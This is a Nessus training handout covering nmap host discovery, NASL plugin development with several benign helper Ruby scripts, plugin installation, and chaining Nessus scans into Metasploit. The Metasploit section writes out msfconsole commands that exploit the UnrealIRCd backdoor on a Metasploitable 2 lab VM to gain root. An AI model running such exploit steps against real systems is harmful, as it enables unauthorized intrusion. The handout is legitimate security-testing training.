Nessus Training - Session 3

Nessus Training
Session 3 - Advanced Topics
Prepared by Ramsey Dow <ramsey@casaba.com> for NWACC
Contents
  Pre-scan Workflow
    Update plugin library
    Identify targets
  Scan Automation
  Custom Plugin Development
    Plugin IDs
    Where the plugins are
    Running plugins from the command line
    Signed and unsigned scripts
    Debugging
    Example from the NASL documentation
    Optimizing your script
    Rules for plugins
    How to install a custom plugin
    Test the new custom plugin
    How to remove custom plugins
  Using Nessus with Metasploit
  Useful Web Sites and Resources
    Scan Automation
    Custom Plugin Development
    Using Nessus with Metasploit
Pre-scan Workflow
It’s quite alright to let Nessus do everything for you. It does use Nmap under the hood.
However, I like to take more control myself. Aside from satisfying the control freak in me, this
also allows me to exclude IPs of hosts I don’t want to scan.
Update plugin library
Tenable updates Nessus plugins on a daily basis. The Nessus daemon will pull new updates
once per 24 hour period. However, new plugins can arrive at many times throughout the day.
I tend to update plugins on the scan server prior to running any meaningful scan.
sudo /opt/nessus/sbin/nessus-update-plugins
Identify targets
I have a scanning workspace that looks like this:
scan\
  archive\
    2013\
      01\
      02\
      ...
      10\
  scripts\
I keep scan-related data in the archive directory, organized by year and month. I stash
time-saving scripts in the scripts directory.
On any given month when I perform scans against a regularly scheduled target, I set the
SCANPATH variable:
SCANPATH="archive/`date +%Y`/`date +%m`"
Then I create the new workspace:
mkdir -p $SCANPATH
Now I can use nmap directly to perform host discovery using options that make sense for the
engagement:
sudo nmap --privileged -sn -oX ${SCANPATH}/network_name.xml ip/mask >& /dev/null
At this step I can use nmap’s --exclude switch to ignore IPs, such as fragile printers.
This gives me an XML file containing host discovery information. Useful, to be sure, but not
consumable by Nessus. I wrote a Ruby script to remedy the situation.
./scripts/nmap2nessus.rb ${SCANPATH}/network_name.xml > ${SCANPATH}/network_targets.txt
nmap2nessus.rb consumes the XML output from nmap and converts it into a Nessus-style
host list. I can upload this list directly into a Nessus scan template.
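The slides mention nmap2nessus.rb but do not show it. The script below is an added example of the same conversion, not the author's nmap2nessus.rb: it parses standard nmap -oX output with Ruby's bundled REXML, keeps only hosts whose status is "up", and prints one address per line, which is the form a Nessus scan template's target list accepts. The embedded XML is a constructed sample, not a real scan.

```ruby
#!/usr/bin/env ruby
# Added example of an nmap XML to Nessus host-list converter.
# Not the author's nmap2nessus.rb; assumes standard `nmap -oX` output.
require 'rexml/document'

# Return the IPv4/IPv6 addresses of every host nmap reported as "up".
# Hosts that are "down" (or have no status) are skipped, so the Nessus
# target list only contains hosts that actually answered discovery.
# MAC addresses are ignored because Nessus cannot scan those.
def nmap_hosts_up(xml)
  doc = REXML::Document.new(xml)
  targets = []
  doc.elements.each('nmaprun/host') do |host|
    status = host.elements['status']
    next unless status && status.attributes['state'] == 'up'
    host.elements.each('address') do |addr|
      next unless %w[ipv4 ipv6].include?(addr.attributes['addrtype'])
      targets << addr.attributes['addr']
    end
  end
  targets.uniq
end

# Render the list in the form Nessus accepts: one target per line.
def nessus_target_list(xml)
  nmap_hosts_up(xml).map { |t| "#{t}\n" }.join
end

# Constructed sample of `nmap -sn -oX` output (not a real scan result).
SAMPLE_NMAP_XML = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <nmaprun scanner="nmap" args="nmap -sn -oX out.xml 192.0.2.0/29">
    <host><status state="up" reason="arp-response"/>
      <address addr="192.0.2.1" addrtype="ipv4"/>
      <address addr="00:11:22:33:44:55" addrtype="mac"/>
    </host>
    <host><status state="down" reason="no-response"/>
      <address addr="192.0.2.2" addrtype="ipv4"/>
    </host>
    <host><status state="up" reason="echo-reply"/>
      <address addr="192.0.2.3" addrtype="ipv4"/>
      <hostnames><hostname name="printer.example" type="PTR"/></hostnames>
    </host>
  </nmaprun>
XML

# Usage: ruby nmap2nessus_example.rb network_name.xml > network_targets.txt
# With no argument the constructed sample above is converted instead.
if __FILE__ == $0
  xml = ARGV.empty? ? SAMPLE_NMAP_XML : File.read(ARGV[0])
  print nessus_target_list(xml)
end
```

Run it on the XML produced by the nmap step above and redirect the output to the targets file; the down host (192.0.2.2 in the sample) is dropped, so a fragile printer excluded with --exclude never reaches the Nessus target list either.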
Scan Automation
lawnmower.rb demonstration.
Custom Plugin Development
NASL is the Nessus Attack Scripting Language. It is a C-like scripting language designed for
implementing security tests. It comes with a couple of security guarantees:
will not send any packet to a host other than the target host
will not execute any commands on your local system
In addition, NASL maintains a small memory footprint compared to other scripting languages.
It is not robust like Python or Ruby.
# This example displays the FTP banner of the remote host:
soc = open_sock_tcp(21);
if (soc)
{
  data = recv_line(socket:soc, length:1024);
  if (data)
  {
    display("The remote FTP banner is : \n", data, "\n");
  }
  else
  {
    display("The remote FTP server seems to be tcp-wrapped\n");
  }
  close(soc);
}
Plugin IDs
Plugins are referenced by IDs. Use 50000–52999 for custom plugins; the 60000–69999 range
is used by Security Center when it auto-generates plugin IDs for compliance checks.
Where the plugins are
Plugins live in the /opt/nessus/lib/nessus/plugins directory.
.inc files contain functions and are included by NASL scripts. .nasl files are Nessus
plugins.
Running plugins from the command line
You use the nasl program to run Nessus plugins from the command line.
nasl is meant to be run serverside, and not by users. If you are running nasl scripts on the
command line then it is difficult to see what is happening.
/opt/nessus/bin/nasl -t 127.0.0.1 -T f.out /opt/nessus/lib/nessus/plugins/finger.nasl
This command checks for the presence of fingerd on localhost. nasl isn’t meant to be
user-friendly, and doesn’t have output like you might expect. The -T option specifies that we
want a debug trace written to a file named f.out.
$ tail -n 2 f.out
[finger.nasl, 2258.1, 1381203487.704611] (TRACE) call open_sock_tcp(, , , , 79 )
[finger.nasl, 2258.1, 1381203487.704777] (TRACE) ret -> 0
nasl tried to connect to port 79 and failed, hence ret -> 0. fingerd is not running on this
machine.
Signed and unsigned scripts
By default, Nessus won’t run unsigned scripts that perform privileged operations, where
privileged means doing things which allow the script to escape its sandbox. Remember,
NASL comes with security guarantees, including not doing unexpected bad things to the
scan server running the script.
If your script does privileged things then you will have to edit
/opt/nessus/etc/nessus/nessusd.conf.imported and change the line
nasl_no_signature_check = no to yes. If you are performing a traditional network
check, you do not need to change this setting.
Additionally, you can pass the -X switch to nasl on the command line, which causes
nasl to skip the signature check. This does not affect nessusd itself; for that you
have to modify the nessusd.conf.imported file.
Debugging
When writing your own scripts it can be useful to engage in bouts of printf style debugging
to see what is going on.
You’ve got two options:
display()
  Writes to stdout
  stdout redirects to /var/nessus/logs/nessus.dump when run by nessusd
debug_print()
  You need to include("global_settings.inc") in your script
  This only fires if debug_level is non-zero
Example from the NASL documentation
$ /opt/nessus/bin/nasl -t 127.0.0.1 -T f.out /opt/nessus/lib/nessus/plugins/test_ssh.nasl
$ cat f.out
[test_ssh.nasl, 5259.1, 1381205788.368034] (TRACE) call get_kb_item(Services/ssh )
[test_ssh.nasl, 5259.1, 1381205788.368045] (TRACE) ret ->
[test_ssh.nasl, 5259.1, 1381205788.368048] (TRACE) call get_port_state(22 )
[test_ssh.nasl, 5259.1, 1381205788.368053] (TRACE) ret -> 1
[test_ssh.nasl, 5259.1, 1381205788.368054] (TRACE) call open_sock_tcp(, , , , 22 )
[test_ssh.nasl, 5259.1, 1381205788.368152] (TRACE) ret -> 1000000
[test_ssh.nasl, 5259.1, 1381205788.368164] (TRACE) call recv(200 , , 1000000 , )
[test_ssh.nasl, 5259.1, 1381205789.372535] (TRACE) ret -> SSH-2.0-OpenSSH_6.1p1 Debian-4..
[test_ssh.nasl, 5259.1, 1381205789.372551] (TRACE) call close(1000000 )
[test_ssh.nasl, 5259.1, 1381205789.372685] (TRACE) ret -> 0
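Reading a -T trace by hand works for two lines but not for a long plugin. The script below is an added example (not a Tenable tool) that parses the trace layout shown in the finger.nasl and test_ssh.nasl runs above, pairs each "call" line with the "ret ->" line that follows it, and then answers the two questions you usually have: which open_sock_tcp() calls returned 0 (connect failed, as with port 79 above) and which calls took a long time (the recv() above waited about a second for the SSH banner). The two embedded traces are the ones from this session, copied into the script so it runs stand-alone.

```ruby
#!/usr/bin/env ruby
# Added example: parse the trace written by `nasl -T f.out`.
# Not a Tenable tool; assumes the line layout
#   [script, run-id, timestamp] (TRACE) call fn(args)
#   [script, run-id, timestamp] (TRACE) ret -> value
TRACE_LINE = /\A\[(?<script>[^,]+), (?<run>[^,]+), (?<ts>\d+\.\d+)\] \(TRACE\) (?<body>.*)\z/

# Turn raw trace text into an array of hashes, one per call, carrying the
# function name, its positional arguments, the return value and how long the
# call took (seconds between the call line and its matching ret line).
def parse_nasl_trace(text)
  calls = []
  pending = nil
  text.each_line do |line|
    m = TRACE_LINE.match(line.chomp)
    next unless m
    if (c = /\Acall (?<fn>\w+)\((?<args>.*)\)\z/.match(m[:body]))
      args = c[:args].split(',').map(&:strip)
      pending = { script: m[:script], fn: c[:fn], args: args,
                  ts: m[:ts].to_f, ret: nil, elapsed: nil }
      calls << pending
    elsif (r = /\Aret ->\s?(?<val>.*)\z/.match(m[:body])) && pending
      pending[:ret] = r[:val].strip
      pending[:elapsed] = (m[:ts].to_f - pending[:ts]).round(3)
      pending = nil
    end
  end
  calls
end

# open_sock_tcp() returns 0 when the connect fails, so a 0 here means the
# port given as the last argument was closed or filtered on the target.
def closed_ports(calls)
  calls.select { |c| c[:fn] == 'open_sock_tcp' && c[:ret] == '0' }
       .map { |c| c[:args].last.to_i }
end

# Names of calls that took longer than `limit` seconds; a slow recv() usually
# means the service accepted the connection but was slow to send its banner.
def slow_calls(calls, limit)
  calls.select { |c| c[:elapsed] && c[:elapsed] > limit }.map { |c| c[:fn] }
end

# Trace lines from the finger.nasl run shown in this session.
FINGER_TRACE = <<~'TRACE'
  [finger.nasl, 2258.1, 1381203487.704611] (TRACE) call open_sock_tcp(, , , , 79 )
  [finger.nasl, 2258.1, 1381203487.704777] (TRACE) ret -> 0
TRACE

# Trace lines from the test_ssh.nasl run shown in this session.
SSH_TRACE = <<~'TRACE'
  [test_ssh.nasl, 5259.1, 1381205788.368034] (TRACE) call get_kb_item(Services/ssh )
  [test_ssh.nasl, 5259.1, 1381205788.368045] (TRACE) ret ->
  [test_ssh.nasl, 5259.1, 1381205788.368048] (TRACE) call get_port_state(22 )
  [test_ssh.nasl, 5259.1, 1381205788.368053] (TRACE) ret -> 1
  [test_ssh.nasl, 5259.1, 1381205788.368054] (TRACE) call open_sock_tcp(, , , , 22 )
  [test_ssh.nasl, 5259.1, 1381205788.368152] (TRACE) ret -> 1000000
  [test_ssh.nasl, 5259.1, 1381205788.368164] (TRACE) call recv(200 , , 1000000 , )
  [test_ssh.nasl, 5259.1, 1381205789.372535] (TRACE) ret -> SSH-2.0-OpenSSH_6.1p1 Debian-4..
  [test_ssh.nasl, 5259.1, 1381205789.372551] (TRACE) call close(1000000 )
  [test_ssh.nasl, 5259.1, 1381205789.372685] (TRACE) ret -> 0
TRACE

# Usage: ruby nasl_trace_example.rb f.out   (no argument: the finger trace above)
if __FILE__ == $0
  text = ARGV.empty? ? FINGER_TRACE : File.read(ARGV[0])
  calls = parse_nasl_trace(text)
  calls.each do |c|
    puts format('%-16s(%s) -> %s  [%ss]', c[:fn], c[:args].join(','), c[:ret], c[:elapsed])
  end
  closed_ports(calls).each { |p| puts "port #{p}: connect failed (open_sock_tcp returned 0)" }
  slow_calls(calls, 0.5).each { |fn| puts "#{fn}() took more than 0.5s" }
end
```

Point it at the f.out from either run above: the finger trace reports port 79 as closed, the SSH trace reports no closed port but flags recv() as the slow call, which is the first thing to look at when a plugin seems to hang.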
Optimizing your script
The best way to optimize your script is to tell nessusd when to not launch it.
If your script depends on a TCP port being open then indicate that your script requires that
port to be open.
script_require_ports(80, "Services/www")
Services/www is a symbolic value, as defined in the Nessus knowledge base.
The Nessus knowledge base represents the state of a scan. Your script may require the
presence of certain state in order to run, e.g. anonymous FTP with writable directories.
script_require_keys("ftp/anonymous", "ftp/writeable_dir")
This will only execute the script if the remote FTP server offers anonymous access and
there is a writeable directory in it.
You can also exclude keys:
script_exclude_keys(k1, k2, ...)
This will cause nessusd to not execute your script if at least one of the keys given as
arguments is set in the knowledge base.
Rules for plugins
Your script must never interact with the user
Your script must test one vulnerability
Your script should belong to an existing family
Look in CVE to see whether there is already an entry for the vulnerability your script tests
How to install a custom plugin
First, copy it to the plugins directory.
sudo cp plugin.nasl /opt/nessus/lib/nessus/plugins
Make sure you don’t have a name conflict!
Stop the Nessus daemon.
sudo service nessusd stop
Restart the Nessus daemon, instructing it to rebuild the plugin index.
sudo /opt/nessus/sbin/nessusd -R
nessusd -R takes a long time as it recompiles the entire plugin database. You can use
nessusd -t instead; it tells nessusd to only recompile the plugins whose timestamp has
changed since the last run. This is much faster.
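Before copying a plugin in, it is worth checking the two things that bite later: a filename that already exists in the plugins directory, and a script ID that is outside the custom range or already taken by another plugin. The script below is an added example of such a pre-install check, not a Tenable tool; it assumes plugins declare their ID with script_id(N), uses the 50000–52999 custom range from the Plugin IDs slide, and takes the existing plugins as a {filename => source} hash so it can run without a Nessus install (load_plugins builds that hash from a real directory). The sample plugin and the existing-plugin list are constructed.

```ruby
#!/usr/bin/env ruby
# Added example: pre-install sanity check for a custom NASL plugin.
# Not a Tenable tool; assumes script_id(N) declarations and the custom ID
# range given in these slides.
CUSTOM_ID_RANGE = (50000..52999)
PLUGIN_DIR = '/opt/nessus/lib/nessus/plugins'

# Extract the numeric argument of script_id(), or nil if the plugin has none.
def script_id(source)
  m = /script_id\(\s*(\d+)\s*\)/.match(source)
  m && m[1].to_i
end

# Return a list of problems; an empty list means the plugin is safe to copy in.
# `existing` maps plugin filenames to their source text.
def check_custom_plugin(name, source, existing)
  problems = []
  id = script_id(source)
  if id.nil?
    problems << 'no script_id() found'
  elsif !CUSTOM_ID_RANGE.cover?(id)
    problems << "script_id #{id} outside custom range #{CUSTOM_ID_RANGE}"
  end
  problems << "file #{name} already exists in the plugins directory" if existing.key?(name)
  existing.each do |fname, src|
    next if fname == name
    problems << "script_id #{id} already used by #{fname}" if id && script_id(src) == id
  end
  problems
end

# Build the {filename => source} hash from a real plugins directory.
def load_plugins(dir = PLUGIN_DIR)
  Dir.glob(File.join(dir, '*.nasl')).to_h { |p| [File.basename(p), File.read(p)] }
end

# Constructed plugin header (not a real Nessus plugin).
SAMPLE_PLUGIN = <<~'NASL'
  if (description)
  {
    script_id(50002);
    script_name("Example custom check (constructed)");
    exit(0);
  }
NASL

# Constructed stand-in for the plugins directory: one stock plugin and one
# custom plugin that already uses ID 50001.
EXISTING_PLUGINS = {
  'example_a.nasl' => 'script_id(10001);',
  'my_old.nasl'    => 'script_id(50001);',
}

# Usage: ruby check_plugin_example.rb my_check.nasl   (checks against PLUGIN_DIR)
if __FILE__ == $0
  name, source, existing =
    if ARGV.empty?
      ['my_check.nasl', SAMPLE_PLUGIN, EXISTING_PLUGINS]
    else
      [File.basename(ARGV[0]), File.read(ARGV[0]), load_plugins]
    end
  problems = check_custom_plugin(name, source, existing)
  puts(problems.empty? ? "#{name}: ok" : problems.map { |p| "#{name}: #{p}" })
  exit problems.empty? ? 0 : 1
end
```

Run it against the real plugins directory before the sudo cp step; a non-zero exit means fix the plugin first rather than discovering the conflict after nessusd -R has spent its time recompiling everything.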
Test the new custom plugin
Create a policy named ssh
Disable all plugin families
Enable service checks and administrative toolbox
Scan a test host using the ssh policy
Review the scan report
Disable ssh on the test host
Rescan the test host
Review the new scan report
Note that the lack of ssh on the test host is flagged as a vulnerability
How to remove custom plugins
Stop the Nessus daemon.
sudo service nessusd stop
Restart the Nessus daemon, instructing it to rebuild the plugin index.
sudo /opt/nessus/sbin/nessusd -R
The “Administrative toolbox” family will still show in policies that reference it. Clicking on the
plugin group will do nothing since it contains no plugins (you removed them). The plugin
family doesn’t show up as an option in new policies.
This weird behavior is why there is a rule about creating new plugin families. Don’t do it!
Using Nessus with Metasploit
Using Nessus with Metasploit is pretty easy and definitely a fun way to spend a Saturday
afternoon!
I installed Metasploit Framework 4 on Ubuntu Desktop 13.04.
Scan something using Nessus (10.211.55.7 in the example, below)
Export the scan results in the NBE format
scp the NBE file to your Metasploit host
Login to the Metasploit host and follow this basic procedure:
sudo msfconsole
db_import bfd6a1940f2061ba5532f33c1197a359.nbe
hosts
services 10.211.55.7
vulns 10.211.55.7 -p 6667
search cve:2010-2075
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST 10.211.55.7
exploit
Voila. root in just a few steps!
For the record, my victim host was a VM running the Metasploitable 2 image.
Useful Web Sites and Resources
Scan Automation
Nessus 5.0 REST Protocol Specification
http://static.tenable.com/documentation/nessus_5.0_XMLRPC_protocol_guide.pdf
CPAN Module Net::Nessus::XMLRPC - perl library for communication with Nessus
scanner(v4.2+) via XMLRPC
https://github.com/kost/nessus-xmlrpc-perl
Ruby gem/library for Nessus XMLRPC interface and Nessus command line example
https://github.com/kost/nessus-xmlrpc-ruby
Python module written for automating tasks within the latest version of Nessus
http://code.google.com/p/nessusxmlrpc/
Custom Plugin Development
Complete list of Nessus plugins
http://www.tenable.com/plugins/index.php?view=all
The Nessus Attack Scripting Language Reference Guide
http://www.dn-systems.org/boss/doc/nasl_guide-20050103.pdf
NASL Documentation
https://discussions.nessus.org/servlet/JiveServlet/download/5815-1228/nasl2_reference.pdf
Using Nessus with Metasploit
Metasploit penetration testing tool
http://www.rapid7.com/products/metasploit/download.jsp
(grab Metasploit Framework from the bottom of the page)
Metasploitable 2 - intentionally vulnerable Linux virtual machine
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/